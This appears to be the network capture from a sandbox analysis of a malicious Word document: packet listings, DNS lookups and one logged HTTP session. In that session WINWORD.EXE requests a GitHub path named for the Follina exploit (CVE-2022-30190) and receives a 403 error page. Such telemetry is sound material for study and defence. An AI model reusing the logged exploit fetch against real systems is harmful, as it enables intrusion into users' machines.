                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.520457983 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.520509005 CEST44349708185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.547281027 CEST44349708185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.547430992 CEST44349708185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.547568083 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.547638893 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.547662020 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.547712088 CEST44349708185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.547750950 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.547991037 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.738296986 CEST49709443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.738351107 CEST44349709185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.738465071 CEST49709443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.738779068 CEST49709443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.738809109 CEST44349709185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.773324966 CEST44349709185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.773426056 CEST49709443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.773793936 CEST49709443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.777215004 CEST49709443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.777286053 CEST44349709185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.803994894 CEST44349709185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.804101944 CEST44349709185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.804143906 CEST49709443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.804210901 CEST49709443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.804347038 CEST49709443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.804377079 CEST44349709185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.804392099 CEST49709443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.804665089 CEST49709443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.859790087 CEST49710443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.859846115 CEST44349710185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.859951019 CEST49710443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.860155106 CEST49710443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.860172987 CEST44349710185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.893461943 CEST44349710185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.894118071 CEST49710443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.895416975 CEST49710443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.895454884 CEST44349710185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.932617903 CEST44349710185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.932840109 CEST44349710185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.932913065 CEST44349710185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.932975054 CEST49710443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.933001995 CEST44349710185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.933111906 CEST44349710185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.933119059 CEST49710443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.933132887 CEST44349710185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.933218002 CEST49710443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.933232069 CEST44349710185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.933284998 CEST44349710185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.933352947 CEST49710443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.933366060 CEST44349710185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.933453083 CEST44349710185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.933556080 CEST49710443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.933568954 CEST44349710185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.933773041 CEST49710443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.933818102 CEST49710443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.973839998 CEST49711443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.973882914 CEST44349711185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.973978043 CEST49711443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.974191904 CEST49711443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.974251986 CEST44349711185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.008501053 CEST44349711185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.015096903 CEST49711443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.016681910 CEST49711443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.016745090 CEST44349711185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.038156033 CEST44349711185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.038252115 CEST44349711185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.038399935 CEST49711443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.038454056 CEST44349711185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.038467884 CEST49711443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.038479090 CEST44349711185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.038486004 CEST49711443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.038490057 CEST44349711185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.052026033 CEST49712443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.052071095 CEST44349712185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.052217960 CEST49712443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.052510977 CEST49712443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.052537918 CEST44349712185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.086909056 CEST44349712185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.087081909 CEST49712443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.087451935 CEST49712443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.090070963 CEST49712443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.090140104 CEST44349712185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.116681099 CEST44349712185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.116805077 CEST49712443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.116820097 CEST44349712185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.116872072 CEST49712443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.116878033 CEST44349712185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.116928101 CEST44349712185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.116936922 CEST49712443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.116945982 CEST44349712185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.116981983 CEST49712443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.117018938 CEST49712443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.117022991 CEST44349712185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.117177010 CEST44349712185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.117249012 CEST49712443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.122709990 CEST49712443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.122734070 CEST44349712185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.314126968 CEST49713443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.314169884 CEST44349713185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.314294100 CEST49713443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.314717054 CEST49713443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.314739943 CEST44349713185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.348025084 CEST44349713185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.348119974 CEST49713443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.348514080 CEST49713443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.357474089 CEST49713443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.357588053 CEST44349713185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.377960920 CEST44349713185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.378041029 CEST44349713185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.378103018 CEST49713443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.378139019 CEST49713443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.378248930 CEST49713443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.378279924 CEST44349713185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.378295898 CEST49713443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.379342079 CEST49713443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.627289057 CEST49714443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.627535105 CEST44349714185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.627679110 CEST49714443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.627958059 CEST49714443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.627983093 CEST44349714185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.662487030 CEST44349714185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.662575960 CEST49714443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.663011074 CEST49714443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.665465117 CEST49714443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.665534019 CEST44349714185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.692361116 CEST44349714185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.692486048 CEST49714443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.692507982 CEST44349714185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.692529917 CEST49714443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.692563057 CEST44349714185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.692608118 CEST49714443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.692666054 CEST49714443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.711343050 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.711412907 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.711551905 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.711844921 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.711879015 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.747437954 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.747697115 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.748193979 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.751252890 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.751323938 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777409077 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777549982 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777582884 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777648926 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777663946 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777731895 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777746916 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777808905 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777822971 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777884960 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777899027 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777964115 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777976990 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.778038979 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.778100014 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.778177023 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.823604107 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.823662996 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.747351885 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.747417927 CEST44349716185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.747524023 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.747744083 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.747762918 CEST44349716185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.783976078 CEST44349716185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.784074068 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.784581900 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.791146994 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.791240931 CEST44349716185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.813627005 CEST44349716185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.813723087 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.813728094 CEST44349716185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.813786030 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.833015919 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.833053112 CEST44349716185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.833065033 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.833170891 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.506854057 CEST5223953192.168.2.48.8.8.8
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.525362015 CEST53522398.8.8.8192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.049834013 CEST6100753192.168.2.48.8.8.8
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.066267014 CEST53610078.8.8.8192.168.2.4
                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.506854057 CEST192.168.2.48.8.8.80x5d75Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.049834013 CEST192.168.2.48.8.8.80xd5d0Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.525362015 CEST8.8.8.8192.168.2.40x5d75No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.525362015 CEST8.8.8.8192.168.2.40x5d75No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.525362015 CEST8.8.8.8192.168.2.40x5d75No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.525362015 CEST8.8.8.8192.168.2.40x5d75No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.066267014 CEST8.8.8.8192.168.2.40xd5d0No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.066267014 CEST8.8.8.8192.168.2.40xd5d0No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.066267014 CEST8.8.8.8192.168.2.40xd5d0No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.066267014 CEST8.8.8.8192.168.2.40xd5d0No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        • raw.githubusercontent.com
                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        0192.168.2.449704185.199.108.133443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC0OUTOPTIONS /drgreenthumb93/CVE-2022-30190-follina/main/ HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Authorization: Bearer
                                                                                                                                                                                                                                        User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                                                                        X-Office-Major-Version: 16
                                                                                                                                                                                                                                        X-MS-CookieUri-Requested: t
                                                                                                                                                                                                                                        X-FeatureVersion: 1
                                                                                                                                                                                                                                        X-MSGETWEBURL: t
                                                                                                                                                                                                                                        X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC0INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:05 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6929-MXP
                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                        X-Timer: S1660787826.582963,VS0,VE9
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: 3ff7e4b791bcf59d1adae5143531aa79a139b0de
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:05 GMT
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding
                                                                                                                                                                                                                                        transfer-encoding: chunked
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC0INData Raw: 34 32 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 42a
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 0d 0a 0d 0a 48 65 6c 6c 6f 20 66 75 74 75 72 65 20 47 69 74 48 75 62 62 65 72 21 20 49 20 62 65 74 20 79 6f 75 27 72 65 20 68 65 72 65 20 74 6f 20 72 65 6d 6f 76 65 20 74 68 6f 73 65 20 6e 61 73 74 79 20 69 6e 6c 69 6e 65 20 73 74 79 6c 65 73 2c 0d 0a 44 52 59 20 75 70 20 74 68 65 73 65 20 74 65 6d 70 6c 61 74 65 73 20 61 6e 64 20 6d 61 6b 65 20 27 65 6d 20 6e 69 63 65 20 61 6e 64 20 72 65 2d 75 73 61 62 6c 65 2c 20 72 69 67 68 74 3f 0d 0a 0d 0a 50 6c 65 61 73 65 2c 20 64 6f 6e 27 74 2e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 74 79 6c 65 67 75 69 64 65 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2e 30 0d 0a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d
                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...Hello future GitHubber! I bet you're here to remove those nasty inline styles,DRY up these templates and make 'em nice and re-usable, right?Please, don't. https://github.com/styleguide/templates/2.0--><html> <head>
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC2INData Raw: 31 35 36 38 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1568
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC2INData Raw: 6f 67 6f 20 7b 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 35 70 78 3b 20 7d 0d 0a 20 20 20 20 20 20 2e 6c 6f 67 6f 2d 69 6d 67 2d 32 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 0d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 0d 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 20 32 29 2c 0d 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 6d 69 6e 2d 2d 6d 6f 7a 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 20 32 29 2c 0d 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 20 20 2d 6f 2d 6d
                                                                                                                                                                                                                                        Data Ascii: ogo { display: inline-block; margin-top: 35px; } .logo-img-2x { display: none; } @media only screen and (-webkit-min-device-pixel-ratio: 2), only screen and ( min--moz-device-pixel-ratio: 2), only screen and ( -o-m
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC3INData Raw: 4f 46 52 76 45 35 46 75 4f 50 53 34 57 4c 53 74 37 2b 38 61 6a 76 58 63 4a 70 63 79 4e 76 68 7a 74 53 77 55 6b 54 47 67 5a 7a 39 75 44 53 78 52 6e 50 5a 77 73 6e 54 6b 71 79 37 6a 70 73 50 74 2f 41 78 79 76 6e 41 65 4a 4d 41 78 50 6e 4d 69 71 50 4a 59 49 79 7a 66 34 2f 4b 71 72 50 65 64 61 4b 35 62 49 73 51 77 66 54 6f 32 74 37 32 68 55 65 70 50 57 76 6e 36 6d 4f 38 56 6f 58 72 67 62 44 52 61 4a 58 6c 65 36 72 37 35 46 7a 5a 6d 37 53 32 54 6e 79 54 4e 55 58 76 35 65 69 44 41 41 36 6a 30 57 6d 4b 79 57 76 35 31 6c 69 52 41 41 43 6a 50 30 4f 5a 4e 56 75 77 61 34 4c 2b 75 51 41 63 77 2f 53 69 4e 47 48 35 37 6d 49 78 78 50 4b 6d 55 33 44 67 70 4c 32 73 58 33 72 75 74 63 33 2f 76 68 39 67 75 31 44 33 74 4e 45 41 74 76 4f 53 4b 56 41 6d 78 66 61 67 52 6d 62 6e
